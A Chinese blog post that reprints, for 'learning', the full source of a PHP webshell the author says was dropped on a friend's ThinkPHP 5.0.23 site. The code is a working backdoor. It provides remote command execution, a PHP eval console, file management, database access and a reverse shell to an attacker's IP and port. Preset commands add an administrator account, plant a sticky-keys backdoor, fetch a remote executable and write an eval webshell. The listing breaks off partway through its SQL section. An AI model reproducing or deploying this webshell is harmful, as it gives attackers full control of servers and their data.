前言

最近朋友网站老是被挂马,原因是用的ThinkPHP5.0.23搭建的网站,该版本框架有个远程命令执行漏洞,然后被拉取了一个后门程序,找到之后发现这程序真是吊炸天了,就分享出来给大家学习之用,请勿用于犯罪行为或商业用途…

效果图

后门程序

  1. <?php
  2. error_reporting(E_ERROR);
  3. @ini_set('display_errors','Off');
  4. @ini_set('max_execution_time',20000);
  5. @ini_set('memory_limit','256M');
  6. header("content-Type: text/html; charset=utf-8");
  7. $password = "5bb80217256f6be095f73fdae53a04ab"; //V
  8. define('B','Denzel-你的英雄'); // 标题
  9. function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }
  10. function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
  11. $myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
  12. $myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
  13. define('THISDIR',strdir(dirname($myfile).'/'));
  14. define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/'));
  15. define('EXISTS_PHPINFO',getinfo() ? true : false);
  16. if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
  17. if(function_exists('mysql_close')) { $issql = 'MySql'; }
  18. if(function_exists('mssql_close')) $issql .= ' - MsSql';
  19. if(function_exists('oci_close')) $issql .= ' - Oracle';
  20. if(function_exists('sybase_close')) $issql .= ' - SyBase';
  21. if(function_exists('pg_close')) $issql .= ' - PostgreSql';
  22. $win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
  23. $msg = VERSION;
  24. function filew($filename,$filedata,$filemode) {
  25. if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
  26. $handle = fopen($filename,$filemode);
  27. $key = fputs($handle,$filedata);
  28. fclose($handle);
  29. return $key;
  30. }
  31. function filer($filename) {
  32. $handle = fopen($filename,'r');
  33. $filedata = fread($handle,filesize($filename));
  34. fclose($handle);
  35. return $filedata;
  36. }
  37. function fileu($filenamea,$filenameb) {
  38. $key = move_uploaded_file($filenamea,$filenameb) ? true : false;
  39. if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
  40. return $key;
  41. }
  42. function filed($filename) {
  43. if(!file_exists($filename)) return false;
  44. ob_end_clean();
  45. $name = basename($filename);
  46. $array = explode('.',$name);
  47. header('Content-type: application/x-'.array_pop($array));
  48. header('Content-Disposition: attachment; filename='.$name);
  49. header('Content-Length: '.filesize($filename));
  50. @readfile($filename);
  51. exit;
  52. }
  53. function showdir($dir) {
  54. $dir = strdir($dir.'/');
  55. if(($handle = @opendir($dir)) == NULL) return false;
  56. $array = array();
  57. while(false !== ($name = readdir($handle))) {
  58. if($name == '.' || $name == '..') continue;
  59. $path = $dir.$name;
  60. $name = strtr($name,array('\'' => '%27','"' => '%22'));
  61. if(is_dir($path)) { $array['dir'][$path] = $name; }
  62. else { $array['file'][$path] = $name; }
  63. }
  64. closedir($handle);
  65. return $array;
  66. }
  67. function deltree($dir) {
  68. $handle = @opendir($dir);
  69. while(false !== ($name = @readdir($handle))) {
  70. if($name == '.' || $name == '..') continue;
  71. $path = $dir.$name;
  72. @chmod($path,0777);
  73. if(is_dir($path)) { deltree($path.'/'); }
  74. else { @unlink($path); }
  75. }
  76. @closedir($handle);
  77. return @rmdir($dir);
  78. }
  79. function size($bytes) {
  80. if($bytes < 1024) return $bytes.' B';
  81. $array = array('B','K','M','G','T');
  82. $floor = floor(log($bytes) / log(1024));
  83. return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
  84. }
  85. function find($array,$string) {
  86. foreach($array as $key) { if(stristr($string,$key)) return true; }
  87. return false;
  88. }
  89. function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
  90. if(($handle = @opendir($dir)) == NULL) return false;
  91. while(false !== ($name = readdir($handle))) {
  92. if($name == '.' || $name == '..') continue;
  93. $path = $dir.$name;
  94. if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
  95. else {
  96. if($inc && (!find($inc,$name))) continue;
  97. $code = $tye ? filer($path) : $name;
  98. $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
  99. if($find) {
  100. $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
  101. echo '<a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
  102. flush(); ob_flush();
  103. }
  104. unset($code);
  105. }
  106. }
  107. closedir($handle);
  108. return true;
  109. }
  110. function antivirus($dir,$exs,$matches,$now) {
  111. if(($handle = @opendir($dir)) == NULL) return false;
  112. while(false !== ($name = readdir($handle))) {
  113. if($name == '.' || $name == '..') continue;
  114. $path = $dir.$name;
  115. if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
  116. else {
  117. $iskill = NULL;
  118. foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
  119. if(strpos(size(filesize($path)),'M')) continue;
  120. if($iskill) {
  121. $code = filer($path);
  122. foreach($matches[$iskill] as $matche) {
  123. $array = array();
  124. preg_match($matche,$code,$array);
  125. if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
  126. $len = strlen($array[0]);
  127. if($len > 6 && $len < 200) {
  128. $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
  129. echo '特征 <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
  130. flush(); ob_flush(); break;
  131. }
  132. }
  133. unset($code,$array);
  134. }
  135. }
  136. }
  137. closedir($handle);
  138. return true;
  139. }
  140. function command($cmd,$cwd,$com = false) {
  141. $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
  142. if($cwd == 'com' || $com) {
  143. if($iswin && class_exists('COM')) {
  144. $wscript = new COM('Wscript.Shell');
  145. $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
  146. $stdout = $exec->StdOut();
  147. $res = $stdout->ReadAll();
  148. $msg = 'Wscript.Shell';
  149. }
  150. } else {
  151. chdir($cwd); $cwd = getcwd();
  152. if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
  153. elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }
  154. elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
  155. elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
  156. elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }
  157. elseif(function_exists('proc_open')) {
  158. $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
  159. $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
  160. $process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
  161. if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }
  162. @proc_close($process);
  163. $msg = 'proc_open';
  164. }
  165. }
  166. $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用'.$msg.'执行成功</h2>';
  167. return array('res' => $res,'msg' => $msg);
  168. }
  169. function backshell($ip,$port,$dir,$type) {
  170. $key = false;
  171. $c_bin = '';
  172. switch($type) {
  173. case "pl" :
  174. $shell = '';
  175. $file = strdir($dir.'/t00ls.pl');
  176. $key = filew($file,base64_decode($shell),'w');
  177. if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }
  178. break;
  179. case "py" :
  180. $shell = '';
  181. $file = strdir($dir.'/t00ls.py');
  182. $key = filew($file,base64_decode($shell),'w');
  183. if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }
  184. break;
  185. case "c" :
  186. $file = strdir($dir.'/t00ls');
  187. $key = filew($file,base64_decode($c_bin),'wb');
  188. if($key) { @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }
  189. break;
  190. case "php" : case "phpwin" :
  191. if(function_exists('fsockopen')) {
  192. $sock = @fsockopen ($ip,$port);
  193. if($sock) {
  194. $key = true;
  195. $com = $type == 'phpwin' ? true : false;
  196. $user = get_current_user();
  197. $dir = strdir(getcwd());
  198. fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");
  199. while($cmd = fread($sock,1024)) {
  200. if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }
  201. elseif (trim(strtolower($cmd)) == 'exit') { break; }
  202. else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }
  203. fputs($sock,'['.$user.':'.$dir.']# ');
  204. }
  205. }
  206. @fclose ($sock);
  207. }
  208. break;
  209. case "pcntl" :
  210. $file = strdir($dir.'/t00ls');
  211. $key = filew($file,base64_decode($c_bin),'wb');
  212. if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } }
  213. break;
  214. }
  215. if(!$key) { $msg = '<h1>临时目录不可写</h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }
  216. return $msg;
  217. }
  218. function getinfo() {
  219. }
  220. function links(){
  221. $hostr = $_SERVER["HTTP_HOST"];
  222. $arr = file_get_contents("http://mytool.chinaz.com/baidusort.aspx?host=".$hostr);
  223. $arr= iconv('UTF-8','GB2312' , $arr);
  224. preg_match_all("/<div class=\"siteinfo\">百度权重:<font color=\"blue\">[1-9]<\/font>/",$arr,$s);
  225. $c=$s[0][0];
  226. $c=str_replace("<div class=\"siteinfo\">百度权重:<font color=\"blue\">","",$c);
  227. $c=str_replace("</font>","",$c);
  228. return $c;
  229. }
  230. function subeval() {
  231. if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }
  232. if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; }
  233. if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; }
  234. if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; }
  235. return true;
  236. }
  237. if(isset($_POST['go'])) {
  238. if($_POST['go'] == 'down') {
  239. $downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);
  240. if(!filed($downfile)) { $msg = '<h1>下载文件不存在</h1>'; }
  241. }
  242. }
  243. ?>
  244. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  245. <html>
  246. <head>
  247. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
  248. <style type="text/css">
  249. * {margin:0px;padding:0px;}
  250. body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Microsoft YaHei,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}
  251. a{color:#000000;text-decoration:none;vertical-align:middle;}
  252. a:hover{color:#FF0000;text-decoration:underline;}
  253. p {padding:1px;line-height:1.6em;}
  254. h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
  255. h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
  256. form {display:inline;}
  257. input,select { vertical-align:middle; }
  258. input[type=text], textarea {padding:1px;font-family:Microsoft YaHei,sans-serif;}
  259. input[type=submit], input[type=button] {height:21px;}
  260. .tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}
  261. .tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
  262. .tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}
  263. .main {width:963px;margin:0 auto;padding:10px;}
  264. .outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
  265. .toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
  266. .footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
  267. .msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}
  268. .actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
  269. .tables {width:100%;}
  270. .tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
  271. .tables td {background:#F9F6F4;height:19px;padding-left:2px;}
  272. </style>
  273. <script type="text/javascript">
  274. function $(ID) { return document.getElementById(ID); }
  275. function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
  276. function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }
  277. function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }
  278. function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); }
  279. function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } }
  280. function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }
  281. function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
  282. function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
  283. </script>
  284. <title><?php echo VERSION.' - 【'.date('Y-m-d H:i:s 星期N',time()).'】';?></title>
  285. </head>
  286. <body>
  287. <div class="main">
  288. <div class="outl">
  289. <div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' - '.php_uname().' - whoami('.get_current_user().') - 【uid('.getmyuid().') gid('.getmygid().')】'; if(isset($issql)) echo ' - 【'.$issql.'】';?></div>
  290. <?php
  291. $menu = array('file' => '文件管理','scan' => '搜索文件','antivirus' => '扫描后门','backshell' => '反弹端口','exec' => '执行命令','phpeval' => '执行PHP','sql' => '执行SQL','info' => '系统信息');
  292. $go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';
  293. $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;
  294. echo '<div class="tag">';
  295. foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }
  296. echo '</div>';
  297. echo '<form name="gofrm" id="gofrm" method="POST">';
  298. subeval();
  299. echo '<input type="hidden" name="go" id="go" value="">';
  300. echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';
  301. echo '<input type="hidden" name="govar" id="govar" value="">';
  302. echo '</form>';
  303. switch($_POST['go']) {
  304. case "info" :
  305. if(EXISTS_PHPINFO) {
  306. ob_start();
  307. phpinfo(INFO_GENERAL);
  308. $out = ob_get_contents();
  309. ob_end_clean();
  310. $tmp = array();
  311. preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);
  312. $config = $tmp[2][0];
  313. $phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];
  314. }
  315. $infos = array(
  316. '客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'],
  317. '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)',
  318. '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)',
  319. 'PHP.ini配置路径' => $phpini ? $phpini : '(无)',
  320. 'PHP运行方式' => php_sapi_name(),
  321. 'PHP版本' => PHP_VERSION,
  322. 'PHP进程PID' => getmypid(),
  323. '客户端IP' => $_SERVER['REMOTE_ADDR'],
  324. '客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],
  325. 'Web服务端口' => $_SERVER['SERVER_PORT'],
  326. 'Web根目录' => $_SERVER['DOCUMENT_ROOT'],
  327. 'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],
  328. 'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],
  329. 'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)',
  330. '当前磁盘总大小' => size(disk_total_space('.')),
  331. '当前磁盘可用空间' => size(disk_free_space('.')),
  332. 'POST最大字数量' => get_cfg_var("post_max_size"),
  333. '允许最大上传文件' => get_cfg_var("upload_max_filesize"),
  334. '程序最大使用内存量' => get_cfg_var("memory_limit"),
  335. '程序最长运行时间' => get_cfg_var("max_execution_time").'秒',
  336. '是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否',
  337. '是否支持Socket' => function_exists('socket_close') ? '是' : '否',
  338. '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',
  339. '是否支持Curl' => function_exists('curl_version') ? '是' : '否',
  340. '是否支持Zlib' => function_exists('gzclose') ? '是' : '否',
  341. '是否支持FTP' => function_exists('ftp_login') ? '是' : '否',
  342. '是否支持XML' => function_exists('xml_set_object') ? '是' : '否',
  343. '是否支持GD_Library' => function_exists('imageline') ? '是' : '否',
  344. '是否支持COM组建' => class_exists('COM') ? '是' : '否',
  345. '是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否',
  346. '是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否',
  347. '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否',
  348. '是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否',
  349. '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否',
  350. '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否',
  351. '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否',
  352. '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',
  353. 'PHP编译参数' => $config ? $config : '(无)'
  354. );
  355. echo '<div class="msgbox">'.$msg.'</div>';
  356. echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>';
  357. foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }
  358. echo '</table>';
  359. break;
  360. case "exec" :
  361. $cmd = $win ? 'dir' : 'ls -al';
  362. $res = array('res' => '命令回显','msg' => $msg);
  363. $str = isset($_POST['str']) ? $_POST['str'] : 'fun';
  364. if(isset($_POST['execcmd'])) {
  365. $cmd = $_POST['execcmd'];
  366. $cwd = $str == 'fun' ? THISDIR : 'com';
  367. $res = command($cmd,$cwd);
  368. }
  369. echo '<div class="msgbox">'.$res['msg'].'</div>';
  370. echo '<form method="POST">';
  371. subeval();
  372. echo '<input type="hidden" name="go" id="go" value="exec">';
  373. echo '<div class="actall">命令 <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';
  374. echo '<select name="str">';
  375. $selects = array('fun' => 'phpfun','com' => 'wscript');
  376. foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }
  377. echo '</select> ';
  378. echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';
  379. echo '<option>---命令集合---</option>';
  380. echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt">写文件</option>';
  381. echo '<option value="whoami">whoami</option>';
  382. echo '<option value="systeminfo">版本信息(Win)</option>';
  383. echo '<option value="path">path(Win)</option>';
  384. echo '<option value="ipconfig /all">ipconfig(Win)</option>';
  385. echo '<option value="tasklist /svc">tasklist(Win)</option>';
  386. echo '<option value="netstat -an">netstat -an(Win)</option>';
  387. echo '<option value="net user">net user(Win)</option>';
  388. echo '<option value="net config workstation">net config workstation(Win)</option>';
  389. echo '<option value="net config server">net config server(Win)</option>';
  390. echo '<option value="net user $ahsec ahsec /add & net localgroup administrators $ahsec /add">添加用户(Win)</option>';
  391. echo '<option value="query user">query user(Win)</option>';
  392. echo '<option value="copy c:windowsexplorer.exe c:windowssystem32sethc.exe & copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe">shift后门(Win)</option>';
  393. echo '<option value="tftp -i ip地址 get server.exe c:\server.exe">Ftp下载(Win)</option>';
  394. echo '<option value="ps -ef">ps(Linux)</option>';
  395. echo '<option value="ifconfig">ifconfig(Linux)</option>';
  396. echo '<option value="cat /etc/syslog.conf">syslog.conf(Linux)</option>';
  397. echo '<option value="cat /etc/my.cnf">my.cnf(Linux)</option>';
  398. echo '<option value="cat /etc/hosts">hosts(Linux)</option>';
  399. echo '<option value="cat /etc/services">services(Linux)</option>';
  400. echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-版本集合</option>';
  401. echo '</select> ';
  402. echo '<input type="submit" style="width:50px;" value="执行">';
  403. echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';
  404. break;
  405. case "scan" :
  406. $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
  407. $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
  408. $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';
  409. $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';
  410. echo '<div class="msgbox">'.$msg.'</div>';
  411. echo '<form method="POST">';
  412. subeval();
  413. echo '<input type="hidden" name="go" id="go" value="scan">';
  414. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  415. echo '<tr><td>搜索路径</td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';
  416. echo '<tr><td>搜索内容</td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> (文件名或文件内容)</td></tr>';
  417. echo '<tr><td>文件后缀</td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> (用"|"分割, 为空则搜索所有文件)</td></tr>';
  418. echo '<tr><td>过滤目录</td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> (用"|"分割, 为空则不过滤目录)</td></tr>';
  419. echo '<tr><td>搜索方式</td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'>搜索文件名</label> ';
  420. echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'>搜索包含文字</label> ';
  421. echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'>匹配大小写</label></td></tr>';
  422. echo '<tr><td>搜索范围</td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>将搜索应用于该文件夹,子文件夹和文件</label> ';
  423. echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'>仅将搜索应用于该文件夹</label></td></tr>';
  424. echo '<tr><td>操作</td><td><input type="submit" style="width:80px;" value="搜索"></td></tr>';
  425. echo '</table></form>';
  426. if($keyword != '') {
  427. flush(); ob_flush();
  428. echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
  429. $incs = $include == '' ? false : explode('|',$include);
  430. $fits = $filters == '' ? false : explode('|',$filters);
  431. $isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);
  432. echo '<p>'.($isread ? '<h2>搜索完成</h2>' : '<h1>搜索失败</h1>').'</p></div>';
  433. }
  434. break;
  435. case "antivirus" :
  436. $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
  437. $typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');
  438. echo '<div class="msgbox">'.$msg.'</div>';
  439. echo '<form method="POST">';
  440. subeval();
  441. echo '<input type="hidden" name="go" id="go" value="antivirus">';
  442. echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>';
  443. echo '<tr><td>扫描路径</td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> (采用正则匹配)</td></tr>';
  444. echo '<tr><td>查杀类型</td><td>';
  445. $types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');
  446. foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';
  447. echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="扫描"></td></tr>';
  448. echo '</table></form>';
  449. if(count($_POST['types']) > 0) {
  450. $matches = array(
  451. 'php' => array( ),
  452. 'asp+aspx' => array( ),
  453. 'jsp' => array()
  454. );
  455. flush();
  456. ob_flush();
  457. echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
  458. $isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);
  459. echo '<p>'.($isread ? '<h2>扫描完成</h2>' : '<h1>扫描失败</h1>').'</p></div>';
  460. }
  461. break;
  462. case "phpeval" :
  463. if(isset($_POST['phpcode'])) {
  464. $phpcode = chop($_POST['phpcode']);
  465. ob_start();
  466. if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }
  467. else { @eval ($phpcode); }
  468. $out = ob_get_contents();
  469. ob_end_clean();
  470. } else {
  471. $phpcode = 'phpinfo();';
  472. $out = '回显窗口';
  473. }
  474. echo base64_decode('');
  475. echo '<div class="msgbox">'.$msg.'</div>';
  476. echo '<form method="POST">';
  477. subeval();
  478. echo '<input type="hidden" name="go" id="go" value="phpeval">';
  479. echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';
  480. echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';
  481. echo '<option>---常用代码---</option>';
  482. echo '<option value="echo readfile(\'C:/web/t00ls.php\');">读取文件</option>';
  483. echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);">写入文件</option>';
  484. echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';">复制文件</option>';
  485. echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';">修改属性</option>';
  486. echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';">远程下载</option>';
  487. echo '<option value="print_r($_SERVER);">环境变量</option>';
  488. echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>';
  489. echo '</select> ';
  490. echo '<input type="submit" style="width:80px;" value="执行"></p></div>';
  491. echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="以HTML运行以上代码" onclick="runcode(\'evalcode\')"></p></div>';
  492. break;
  493. case "sql" :
  494. if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {
  495. $type = $_POST['type'];
  496. $sqlhost = $_POST['sqlhost'];
  497. $sqluser = $_POST['sqluser'];
  498. $sqlpass = $_POST['sqlpass'];
  499. $sqlname = $_POST['sqlname'];
  500. $sqlcode = $_POST['sqlcode'];
  501. $names = $_POST['names'];
  502. switch($type) {
  503. case "PostgreSql" :
  504. if(function_exists('pg_close')){
  505. if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }
  506. else { $sqlport = 5432; }
  507. $dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");
  508. if($dbconn) {
  509. $msg = '<h2>连接'.$type.'成功 </h2>';
  510. pg_query('set client_encoding='.$names);
  511. $result = pg_query($sqlcode);
